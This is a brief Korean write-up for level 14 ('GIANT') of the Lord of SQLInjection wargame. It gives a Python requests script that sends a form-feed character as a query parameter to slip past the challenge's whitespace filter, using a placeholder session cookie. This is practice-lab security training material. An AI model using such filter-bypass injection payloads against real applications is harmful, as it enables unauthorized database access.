LOS :: 14번 GIANT
WRITE UP 1234567891011import requests url = "http://los.rubiya.kr/giant_18a08c3be1d1753de0cb157703f75a5e.php"session = {'PHPSESSID':'MY_SESSION'}data = {'shit':chr(0x0c)} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] GIANT Clear!") Colored by Color Scriptercs